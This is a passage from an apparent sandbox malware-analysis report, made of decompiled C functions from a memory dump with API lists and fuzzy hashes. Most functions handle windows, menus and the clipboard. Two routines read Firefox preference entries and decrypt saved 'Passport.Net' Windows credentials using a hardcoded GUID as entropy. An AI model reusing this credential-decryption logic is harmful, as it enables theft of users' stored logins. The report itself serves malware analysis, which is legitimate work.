							_t54 = _t54 + 0x14;
							_t86 = _t86 - 1;
						} while (_t86 != 0);
					}
					_v8 = 1;
				}
				if(E00401540(0x448, _t80, _a4) == 1) {
					E004083B1( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
					InvalidateRect(( *(_t80 + 0xc))[2], 0, 0);
				}
				_t47 = SetFocus(_a8);
				if(_v8 != 0) {
					_push( *(_t80 + 0x10));
					L004115D6();
				}
				return _t47;
			}


















                                                                                              0x00405960
                                                                                              0x00405964
                                                                                              0x00405969
                                                                                              0x0040596b
                                                                                              0x0040596e
                                                                                              0x00405971
                                                                                              0x00405979
                                                                                              0x00405981
                                                                                              0x0040597b
                                                                                              0x0040597b
                                                                                              0x0040597d
                                                                                              0x0040597d
                                                                                              0x00405983
                                                                                              0x00405986
                                                                                              0x00405988
                                                                                              0x0040598a
                                                                                              0x0040598c
                                                                                              0x0040598d
                                                                                              0x00405993
                                                                                              0x00405993
                                                                                              0x00405999
                                                                                              0x0040599c
                                                                                              0x004059a6
                                                                                              0x004059a7
                                                                                              0x004059aa
                                                                                              0x004059b3
                                                                                              0x004059b4
                                                                                              0x004059c3
                                                                                              0x004059c5
                                                                                              0x004059d3
                                                                                              0x004059d8
                                                                                              0x004059db
                                                                                              0x004059e0
                                                                                              0x004059e7
                                                                                              0x004059ea
                                                                                              0x004059f3
                                                                                              0x004059f4
                                                                                              0x004059fc
                                                                                              0x004059ff
                                                                                              0x00405a01
                                                                                              0x00405a03
                                                                                              0x00405a06
                                                                                              0x00405a0e
                                                                                              0x00405a11
                                                                                              0x00405a11
                                                                                              0x00405a03
                                                                                              0x00405a14
                                                                                              0x00405a14
                                                                                              0x00405a2c
                                                                                              0x00405a34
                                                                                              0x00405a41
                                                                                              0x00405a41
                                                                                              0x00405a4a
                                                                                              0x00405a53
                                                                                              0x00405a55
                                                                                              0x00405a58
                                                                                              0x00405a5d
                                                                                              0x00405a61

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                              • String ID:
                                                                                              • API String ID: 2313361498-0
                                                                                              • Opcode ID: e9f0ab907bec5e8f57c7acbac99c3809d1984f2ed9ff4bf297ffd43cd07246d7
                                                                                              • Instruction ID: c71b172428599a8aed3dd41af9edf36fe528ac6939486576e3287dd5c50b91d7
                                                                                              • Opcode Fuzzy Hash: e9f0ab907bec5e8f57c7acbac99c3809d1984f2ed9ff4bf297ffd43cd07246d7
                                                                                              • Instruction Fuzzy Hash: 9931C6B2600605BFDB149F29D88591AF7A5FF44354B10863FF54AE72A0DB78EC408F98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040A698, Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040A698(void* __esi) {
				struct HDWP__* _v8;
				int _v12;
				intOrPtr _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _t32;
				int _t60;
				int _t65;

				if( *((intOrPtr*)(__esi + 0x124)) != 0) {
					GetClientRect( *(__esi + 0x108),  &_v32);
					GetWindowRect( *(__esi + 0x114),  &_v48);
					_t65 = _v48.bottom - _v48.top + 1;
					GetWindowRect( *(__esi + 0x118),  &_v48);
					_v12 = _v32.right - _v32.left;
					_t60 = _v48.bottom - _v48.top + 1;
					_v16 = _v32.bottom - _v32.top;
					_v8 = BeginDeferWindowPos(3);
					DeferWindowPos(_v8,  *(__esi + 0x118), 0, 0, 0, _v12, _t60, 4);
					DeferWindowPos(_v8,  *(__esi + 0x114), 0, 0, _v32.bottom - _t65 + 1, _v12, _t65, 6);
					DeferWindowPos(_v8,  *( *((intOrPtr*)(__esi + 0x370)) + 0x184), 0, 0, _t60, _v12, _v16 - _t60 - _t65, 4);
					return EndDeferWindowPos(_v8);
				}
				return _t32;
			}











                                                                                              0x0040a6a5
                                                                                              0x0040a6b7
                                                                                              0x0040a6cd
                                                                                              0x0040a6df
                                                                                              0x0040a6e0
                                                                                              0x0040a6ee
                                                                                              0x0040a6f9
                                                                                              0x0040a6fa
                                                                                              0x0040a709
                                                                                              0x0040a71a
                                                                                              0x0040a73a
                                                                                              0x0040a761
                                                                                              0x00000000
                                                                                              0x0040a771
                                                                                              0x0040a773

                                                                                              APIs
                                                                                              • GetClientRect.USER32 ref: 0040A6B7
                                                                                              • GetWindowRect.USER32 ref: 0040A6CD
                                                                                              • GetWindowRect.USER32 ref: 0040A6E0
                                                                                              • BeginDeferWindowPos.USER32 ref: 0040A6FD
                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040A71A
                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040A73A
                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040A761
                                                                                              • EndDeferWindowPos.USER32(?), ref: 0040A76A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Window$Defer$Rect$BeginClient
                                                                                              • String ID:
                                                                                              • API String ID: 2126104762-0
                                                                                              • Opcode ID: 7346dcf7e22bd518b4d0e96dfafb7fac3e60ecb16f258d456982d784f7109538
                                                                                              • Instruction ID: 87e3885615821b4149b7d1c90d618f2f4546f2004ccbdac015d6c62594ca92fd
                                                                                              • Opcode Fuzzy Hash: 7346dcf7e22bd518b4d0e96dfafb7fac3e60ecb16f258d456982d784f7109538
                                                                                              • Instruction Fuzzy Hash: 1E21A771A00209FFDB11CFA8DE89FEEBBB9FB08710F104465F655E2160C771AA519B24
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406069, Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemorystringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 91%
                                                                                              			E00406069(void* _a4) {
				signed int _t11;
				int _t13;
				void* _t17;
				signed int _t19;
				void* _t22;

				_t22 = _a4;
				_t19 = 0;
				EmptyClipboard();
				if(_t22 != 0) {
					_t2 = strlen(_t22) + 1; // 0x1
					_t13 = _t2;
					_t17 = GlobalAlloc(0x2000, _t13);
					if(_t17 != 0) {
						memcpy(GlobalLock(_t17), _t22, _t13);
						GlobalUnlock(_t17);
						_t11 = SetClipboardData(1, _t17);
						asm("sbb esi, esi");
						_t19 =  ~( ~_t11);
					}
				}
				CloseClipboard();
				return _t19;
			}








                                                                                              0x0040606a
                                                                                              0x0040606f
                                                                                              0x00406071
                                                                                              0x00406079
                                                                                              0x00406084
                                                                                              0x00406084
                                                                                              0x00406093
                                                                                              0x00406097
                                                                                              0x004060a3
                                                                                              0x004060ac
                                                                                              0x004060b5
                                                                                              0x004060bf
                                                                                              0x004060c1
                                                                                              0x004060c1
                                                                                              0x004060c4
                                                                                              0x004060c5
                                                                                              0x004060cf

                                                                                              APIs
                                                                                              • EmptyClipboard.USER32(?,?,0040AEA7,?), ref: 00406071
                                                                                              • strlen.MSVCRT ref: 0040607E
                                                                                              • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040AEA7,?), ref: 0040608D
                                                                                              • GlobalLock.KERNEL32 ref: 0040609A
                                                                                              • memcpy.MSVCRT ref: 004060A3
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004060AC
                                                                                              • SetClipboardData.USER32 ref: 004060B5
                                                                                              • CloseClipboard.USER32(?,?,0040AEA7,?), ref: 004060C5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                                                              • String ID:
                                                                                              • API String ID: 3116012682-0
                                                                                              • Opcode ID: e5bd8c8a43ca7d2c4db01fa4e1da57243b9996234b951f9bb1286513fb8d9efd
                                                                                              • Instruction ID: 7816216ade6a299d8ea944e6e9fe2aa84d769726faeb140b6a28ec5125b6acba
                                                                                              • Opcode Fuzzy Hash: e5bd8c8a43ca7d2c4db01fa4e1da57243b9996234b951f9bb1286513fb8d9efd
                                                                                              • Instruction Fuzzy Hash: 0DF0B4375402296BC3102BA0AD4CEDB7B6CEBC8B557028139FB0AD3151EA78592487B9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040C530, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 80%
                                                                                              			E0040C530(void* __eflags, intOrPtr* _a4) {
				int _v8;
				char _v12;
				intOrPtr _v16;
				void _v1029;
				void _v1039;
				char _v1040;
				void _v2063;
				void _v2064;
				void _v3087;
				void _v3088;
				void* __ebx;
				intOrPtr _t53;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t67;
				void* _t68;
				void* _t73;
				void* _t85;
				int _t86;
				void* _t106;
				int _t107;
				int _t111;
				void* _t114;
				void* _t115;
				void* _t116;

				_v1040 = 0;
				memset( &_v1039, 0, 0x3ff);
				_v3088 = 0;
				memset( &_v3087, 0, 0x3ff);
				_v2064 = 0;
				memset( &_v2063, 0, 0x3ff);
				_t116 = _t115 + 0x24;
				_t53 = E00406B74(_a4 + 4);
				_v12 = 0;
				_v16 = _t53;
				_t54 = E00406900(_t53,  &_v1040,  &_v1040,  &_v12);
				if(_t54 != 0) {
					do {
						_t56 = E004069D2(0, "user_pref(\"");
						_pop(_t92);
						if(_t56 != 0) {
							goto L10;
						}
						_push(0x412b10);
						_t60 = 0xb;
						_t14 = E004069D2(_t60) - 0xb; // -11
						_t92 = _t14;
						_v8 = _t92;
						if(_t92 <= 0) {
							goto L10;
						}
						_t85 = E004069D2(_t61 + 1, 0x412b18);
						_t17 = _t85 + 1; // 0x1
						_t106 = E004069D2(_t17, 0x412b10);
						if(_t106 <= 0) {
							_t28 = _t85 + 1; // 0x1
							_t67 = E004069D2(_t28, ")");
							_pop(_t92);
							_t68 = 0xfffffffe;
							_t111 = _t67 + _t68 - _t85;
							if(_t111 <= 0) {
								goto L10;
							}
							_t107 = _v8;
							memcpy( &_v3088,  &_v1029, _t107);
							 *((char*)(_t114 + _t107 - 0xc0c)) = 0;
							_t73 = _t114 + _t85 - 0x40a;
							L9:
							memcpy( &_v2064, _t73, _t111);
							_t92 = _a4;
							_t116 = _t116 + 0x18;
							 *((char*)(_t114 + _t111 - 0x80c)) = 0;
							_t59 =  *((intOrPtr*)( *_a4))( &_v3088,  &_v2064);
							if(_t59 == 0) {
								break;
							}
							goto L10;
						}
						_t20 = _t106 + 1; // 0x1
						_t111 = E004069D2(_t20, 0x412b10) - _t106 - 1;
						_pop(_t92);
						if(_t111 <= 0) {
							goto L10;
						}
						_t86 = _v8;
						memcpy( &_v3088,  &_v1029, _t86);
						 *((char*)(_t114 + _t86 - 0xc0c)) = 0;
						_t73 = _t114 + _t106 - 0x40b;
						goto L9;
						L10:
						_t59 = E00406900(_v16, _t92,  &_v1040,  &_v12);
					} while (_t59 != 0);
					return _t59;
				}
				return _t54;
			}






























                                                                                              0x0040c54b
                                                                                              0x0040c551
                                                                                              0x0040c55f
                                                                                              0x0040c565
                                                                                              0x0040c573
                                                                                              0x0040c579
                                                                                              0x0040c581
                                                                                              0x0040c587
                                                                                              0x0040c596
                                                                                              0x0040c59c
                                                                                              0x0040c59f
                                                                                              0x0040c5a8
                                                                                              0x0040c5af
                                                                                              0x0040c5bc
                                                                                              0x0040c5c3
                                                                                              0x0040c5c4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040c5cf
                                                                                              0x0040c5d2
                                                                                              0x0040c5df
                                                                                              0x0040c5df
                                                                                              0x0040c5e4
                                                                                              0x0040c5e7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040c5fe
                                                                                              0x0040c600
                                                                                              0x0040c610
                                                                                              0x0040c61b
                                                                                              0x0040c661
                                                                                              0x0040c664
                                                                                              0x0040c669
                                                                                              0x0040c66e
                                                                                              0x0040c671
                                                                                              0x0040c675
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040c677
                                                                                              0x0040c689
                                                                                              0x0040c68e
                                                                                              0x0040c696
                                                                                              0x0040c69d
                                                                                              0x0040c6a6
                                                                                              0x0040c6ab
                                                                                              0x0040c6b0
                                                                                              0x0040c6c1
                                                                                              0x0040c6c9
                                                                                              0x0040c6cd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040c6cd
                                                                                              0x0040c61d
                                                                                              0x0040c62a
                                                                                              0x0040c62d
                                                                                              0x0040c62e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040c634
                                                                                              0x0040c646
                                                                                              0x0040c64b
                                                                                              0x0040c653
                                                                                              0x00000000
                                                                                              0x0040c6cf
                                                                                              0x0040c6dd
                                                                                              0x0040c6e5
                                                                                              0x00000000
                                                                                              0x0040c6ec
                                                                                              0x0040c6f0

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memcpymemset$strlen$_memicmp
                                                                                              • String ID: user_pref("
                                                                                              • API String ID: 765841271-2487180061
                                                                                              • Opcode ID: 982af1ce4df36f9e7f27790100b248c040b5dee6bd91ee0204a86cb4ecdb3b86
                                                                                              • Instruction ID: b5bbfaa39c0e48752cfa6ff41fc25d90fc637c7d31dd27b270ce5155e9a91379
                                                                                              • Opcode Fuzzy Hash: 982af1ce4df36f9e7f27790100b248c040b5dee6bd91ee0204a86cb4ecdb3b86
                                                                                              • Instruction Fuzzy Hash: A74168B2904118AADB10DB95DCC0EDA77AD9F44314F1046BBE605F7181EA389F49CFA8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040559F, Relevance: 10.6, APIs: 7, Instructions: 126windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 61%
                                                                                              			E0040559F(intOrPtr _a4) {
				struct HWND__* _v12;
				signed int _v16;
				int _v20;
				int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				int _v48;
				char* _v52;
				void* _v64;
				void _v319;
				char _v320;
				struct HWND__* _t53;
				intOrPtr* _t59;
				void* _t61;
				intOrPtr _t66;
				void* _t74;
				void* _t80;
				intOrPtr _t81;
				void* _t84;
				intOrPtr _t89;
				short _t91;
				signed int _t94;
				short* _t95;
				void* _t96;
				void* _t97;

				_t89 = _a4;
				_t53 = GetDlgItem( *(_t89 + 4), 0x3e9);
				_v12 = _t53;
				SendMessageA(_t53, 0x1009, 0, 0);
				SendMessageA(_v12, 0x1036, 0, 0x26);
				do {
				} while (SendMessageA(_v12, 0x101c, 0, 0) != 0);
				_push(0xc8);
				_push(0);
				_push(0);
				_push(_v12);
				_t80 = 6;
				E00404925(0x412466, _t80);
				_t59 =  *((intOrPtr*)(_t89 + 0xc));
				_t81 =  *((intOrPtr*)(_t59 + 4));
				_t97 = _t96 + 0x10;
				_v32 = _t81;
				_v28 =  *_t59;
				_v20 = 0;
				if(_t81 <= 0) {
					L10:
					_t61 = 2;
					E004048B6(_t61, _v12, 0, _t61);
					return SetFocus(_v12);
				} else {
					goto L3;
				}
				do {
					L3:
					_v16 = 0;
					_v24 = 0;
					do {
						_t94 = _v16 << 2;
						if( *((short*)(_v28 + _t94 + 2)) == _v20) {
							_v320 = 0;
							memset( &_v319, 0, 0xff);
							_t97 = _t97 + 0xc;
							_v52 =  &_v320;
							_v64 = 4;
							_v48 = 0xff;
							if(SendMessageA( *( *((intOrPtr*)(_a4 + 0xc)) + 8), 0x1019, _v16,  &_v64) != 0) {
								_push(_v16);
								_push(0);
								_push(_v12);
								_t84 = 5;
								_t74 = E0040496E( &_v320, _t84);
								_t95 = _t94 + _v28;
								_t91 =  *_t95;
								E00404CE9(_v12, _t74, 0 | _t91 > 0x00000000);
								_t97 = _t97 + 0x18;
								if(_t91 == 0) {
									 *_t95 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10)) + _v24 + 0xc));
								}
							}
						}
						_v16 = _v16 + 1;
						_t66 = _v32;
						_v24 = _v24 + 0x14;
					} while (_v16 < _t66);
					_v20 = _v20 + 1;
				} while (_v20 < _t66);
				goto L10;
			}




























                                                                                              0x004055ab
                                                                                              0x004055b6
                                                                                              0x004055cc
                                                                                              0x004055cf
                                                                                              0x004055dc
                                                                                              0x004055de
                                                                                              0x004055ea
                                                                                              0x004055ee
                                                                                              0x004055f3
                                                                                              0x004055f4
                                                                                              0x004055f5
                                                                                              0x004055ff
                                                                                              0x00405600
                                                                                              0x00405605
                                                                                              0x00405608
                                                                                              0x0040560d
                                                                                              0x00405612
                                                                                              0x00405615
                                                                                              0x00405618
                                                                                              0x0040561b
                                                                                              0x004056f5
                                                                                              0x004056f7
                                                                                              0x004056fd
                                                                                              0x00405712
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405621
                                                                                              0x00405621
                                                                                              0x00405621
                                                                                              0x00405624
                                                                                              0x00405627
                                                                                              0x0040562d
                                                                                              0x00405638
                                                                                              0x0040564c
                                                                                              0x00405652
                                                                                              0x00405660
                                                                                              0x00405669
                                                                                              0x00405673
                                                                                              0x00405680
                                                                                              0x0040568b
                                                                                              0x0040568d
                                                                                              0x00405696
                                                                                              0x00405697
                                                                                              0x0040569c
                                                                                              0x0040569d
                                                                                              0x004056a5
                                                                                              0x004056a7
                                                                                              0x004056b9
                                                                                              0x004056be
                                                                                              0x004056c3
                                                                                              0x004056d3
                                                                                              0x004056d3
                                                                                              0x004056c3
                                                                                              0x0040568b
                                                                                              0x004056d6
                                                                                              0x004056d9
                                                                                              0x004056dc
                                                                                              0x004056e0
                                                                                              0x004056e9
                                                                                              0x004056ec
                                                                                              0x00000000

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessageSend$FocusItemmemset
                                                                                              • String ID:
                                                                                              • API String ID: 4281309102-0
                                                                                              • Opcode ID: 373d2b268ded57f609baf290f43656ad992e230c838bd3448275ee254fe81e2e
                                                                                              • Instruction ID: c9ec69d2b7f122f2474fbd4df523f5fea2365e5f162f49a3354b930d279265bd
                                                                                              • Opcode Fuzzy Hash: 373d2b268ded57f609baf290f43656ad992e230c838bd3448275ee254fe81e2e
                                                                                              • Instruction Fuzzy Hash: 304126B5D00109AFDB209F99DC81DAEBBB9FF04348F00846AE918B7291D7759E50CFA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040D5DB, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 97stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 64%
                                                                                              			E0040D5DB(char* __ebx, void* __eflags) {
				char _v8;
				short* _v12;
				int _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v48;
				intOrPtr _v52;
				int _v56;
				char _v60;
				char _v584;
				void* __edi;
				void* __esi;
				void* _t36;
				intOrPtr _t44;
				void* _t47;
				char _t63;
				int _t69;
				void* _t74;

				_t74 = __eflags;
				_t69 = 0;
				E004046D7( &_v584);
				_v60 = 0;
				_v56 = 0;
				_t36 = E00404647( &_v60, 0, _t74);
				_t75 = _t36;
				if(_t36 != 0 && E004047A0( &_v584, _t75) != 0) {
					_push( &_v8);
					_push(0);
					_push(4);
					_push("Passport.Net\\*");
					if(_v52() != 0) {
						_t44 = _v8;
						if( *((intOrPtr*)(_t44 + 0x30)) != 0 &&  *((intOrPtr*)(_t44 + 0x18)) > 0) {
							_v32 =  *((intOrPtr*)(_t44 + 0x18));
							_v28 =  *((intOrPtr*)(_t44 + 0x1c));
							_t47 = 0;
							_t63 = 0x4a;
							do {
								_t14 = _t47 + L"82BD0E67-9FEA-4748-8672-D5EFE5B779B0"; // 0x320038
								 *(_t47 + 0x417768) =  *_t14 << 2;
								_t47 = _t47 + 2;
							} while (_t47 < _t63);
							_v24 = _t63;
							_v20 = 0x417768;
							if(E00404811( &_v584,  &_v32,  &_v24,  &_v16) != 0) {
								if(WideCharToMultiByte(0, 0, _v12, _v16,  &(__ebx[0x100]), 0xff, 0, 0) > 0 && strlen( *(_v8 + 0x30)) < 0xff) {
									strcpy(__ebx,  *(_v8 + 0x30));
									_t69 = 1;
								}
								LocalFree(_v12);
							}
							_t44 = _v8;
						}
						_v48(_t44);
					}
				}
				E004046C2( &_v60);
				E004047F1( &_v584);
				return _t69;
			}























                                                                                              0x0040d5db
                                                                                              0x0040d5ec
                                                                                              0x0040d5ee
                                                                                              0x0040d5f6
                                                                                              0x0040d5f9
                                                                                              0x0040d5fc
                                                                                              0x0040d601
                                                                                              0x0040d603
                                                                                              0x0040d619
                                                                                              0x0040d61a
                                                                                              0x0040d61b
                                                                                              0x0040d61d
                                                                                              0x0040d627
                                                                                              0x0040d62d
                                                                                              0x0040d633
                                                                                              0x0040d645
                                                                                              0x0040d64d
                                                                                              0x0040d650
                                                                                              0x0040d652
                                                                                              0x0040d653
                                                                                              0x0040d653
                                                                                              0x0040d65e
                                                                                              0x0040d666
                                                                                              0x0040d667
                                                                                              0x0040d67d
                                                                                              0x0040d680
                                                                                              0x0040d68e
                                                                                              0x0040d6af
                                                                                              0x0040d6c8
                                                                                              0x0040d6d1
                                                                                              0x0040d6d1
                                                                                              0x0040d6d5
                                                                                              0x0040d6d5
                                                                                              0x0040d6db
                                                                                              0x0040d6db
                                                                                              0x0040d6df
                                                                                              0x0040d6df
                                                                                              0x0040d627
                                                                                              0x0040d6e5
                                                                                              0x0040d6f0
                                                                                              0x0040d6fa

                                                                                              APIs
                                                                                                • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                                • Part of subcall function 00404647: LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,7554F420), ref: 00404654
                                                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                                                                • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                                                                • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7554F420), ref: 004047A8
                                                                                                • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040D6A7
                                                                                              • strlen.MSVCRT ref: 0040D6B7
                                                                                              • strcpy.MSVCRT(?,?), ref: 0040D6C8
                                                                                              • LocalFree.KERNEL32(?), ref: 0040D6D5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$LibraryLoadstrcpy$ByteCharFreeLocalMultiWidestrlen
                                                                                              • String ID: Passport.Net\*$hwA
                                                                                              • API String ID: 3335197805-2625321100
                                                                                              • Opcode ID: 681d14a731c87845a5ac1aff75d07a7c211cae895baa553a1b5e579bb43f8a69
                                                                                              • Instruction ID: 2e6419ae4a5a1056fcde8d8ccc48918818cbcf4cd0f285746335566170a6875e
                                                                                              • Opcode Fuzzy Hash: 681d14a731c87845a5ac1aff75d07a7c211cae895baa553a1b5e579bb43f8a69
                                                                                              • Instruction Fuzzy Hash: D4315C76D00109ABCB10EF96D9449EEB7BDEF84300F10047AF605E7291DB399A45CB68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407EFB, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 41%
                                                                                              			E00407EFB(void* __ecx, void* __eflags, struct tagMENUITEMINFOA _a4, struct HMENU__* _a8, intOrPtr _a12, int _a20, intOrPtr _a24, char* _a40, int _a44, char _a52, void _a53) {
				int _v0;
				int _t26;
				char* _t32;
				int _t44;
				signed int _t46;
				signed int _t47;

				_t38 = __ecx;
				_t47 = _t46 & 0xfffffff8;
				E004118A0(0x1040, __ecx);
				_t26 = GetMenuItemCount(_a8);
				_t44 = 0;
				_v0 = _t26;
				if(_t26 <= 0) {
					L13:
					return _t26;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a53, 0, 0x1000);
					_t47 = _t47 + 0xc;
					_a40 =  &_a52;
					_a4.cbSize = 0x30;
					_a8 = 0x36;
					_a44 = 0x1000;
					_a20 = 0;
					_a52 = 0;
					_t26 = GetMenuItemInfoA(_a8, _t44, 1,  &_a4);
					if(_t26 == 0) {
						goto L12;
					}
					if(_a52 == 0) {
						L10:
						_t55 = _a24;
						if(_a24 != 0) {
							_push(0);
							_push(_a24);
							_push(_a4.cbSize);
							_t26 = E00407EFB(_t38, _t55);
							_t47 = _t47 + 0xc;
						}
						goto L12;
					}
					_t32 = strchr( &_a52, 9);
					if(_t32 != 0) {
						 *_t32 = 0;
					}
					_t33 = _a20;
					if(_a24 != 0) {
						if(_a12 == 0) {
							 *0x4171b4 =  *0x4171b4 + 1;
							_t33 =  *0x4171b4 + 0x11558;
							__eflags =  *0x4171b4 + 0x11558;
						} else {
							_t18 = _t44 + 0x11171; // 0x11171
							_t33 = _t18;
						}
					}
					_t26 = E00407EC3(_t33,  &_a52);
					_pop(_t38);
					goto L10;
					L12:
					_t44 = _t44 + 1;
				} while (_t44 < _v0);
				goto L13;
			}









                                                                                              0x00407efb
                                                                                              0x00407efe
                                                                                              0x00407f06
                                                                                              0x00407f10
                                                                                              0x00407f18
                                                                                              0x00407f1c
                                                                                              0x00407f20
                                                                                              0x00407fe5
                                                                                              0x00407fea
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407f26
                                                                                              0x00407f26
                                                                                              0x00407f31
                                                                                              0x00407f36
                                                                                              0x00407f3d
                                                                                              0x00407f4c
                                                                                              0x00407f54
                                                                                              0x00407f5c
                                                                                              0x00407f64
                                                                                              0x00407f68
                                                                                              0x00407f6c
                                                                                              0x00407f74
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407f7a
                                                                                              0x00407fc4
                                                                                              0x00407fc4
                                                                                              0x00407fc8
                                                                                              0x00407fca
                                                                                              0x00407fcb
                                                                                              0x00407fcf
                                                                                              0x00407fd2
                                                                                              0x00407fd7
                                                                                              0x00407fd7
                                                                                              0x00000000
                                                                                              0x00407fc8
                                                                                              0x00407f83
                                                                                              0x00407f8c
                                                                                              0x00407f8e
                                                                                              0x00407f8e
                                                                                              0x00407f94
                                                                                              0x00407f98
                                                                                              0x00407f9d
                                                                                              0x00407fa7
                                                                                              0x00407fb2
                                                                                              0x00407fb2
                                                                                              0x00407f9f
                                                                                              0x00407f9f
                                                                                              0x00407f9f
                                                                                              0x00407f9f
                                                                                              0x00407f9d
                                                                                              0x00407fbd
                                                                                              0x00407fc3
                                                                                              0x00000000
                                                                                              0x00407fda
                                                                                              0x00407fda
                                                                                              0x00407fdb
                                                                                              0x00000000

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                              • String ID: 0$6
                                                                                              • API String ID: 2300387033-3849865405
                                                                                              • Opcode ID: d1119da1829f27f5b6955e53606e2fca4aef30ff8dacb709f4e7d2ab8ff52e08
                                                                                              • Instruction ID: e6a74f55cf859b5146a282672b091174d688b167a10cd96a0b5acbf0203f559b
                                                                                              • Opcode Fuzzy Hash: d1119da1829f27f5b6955e53606e2fca4aef30ff8dacb709f4e7d2ab8ff52e08
                                                                                              • Instruction Fuzzy Hash: B821917190C381AFD7109F21D88199BBBE8FB84348F44897FF68496290E779E944CB5B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

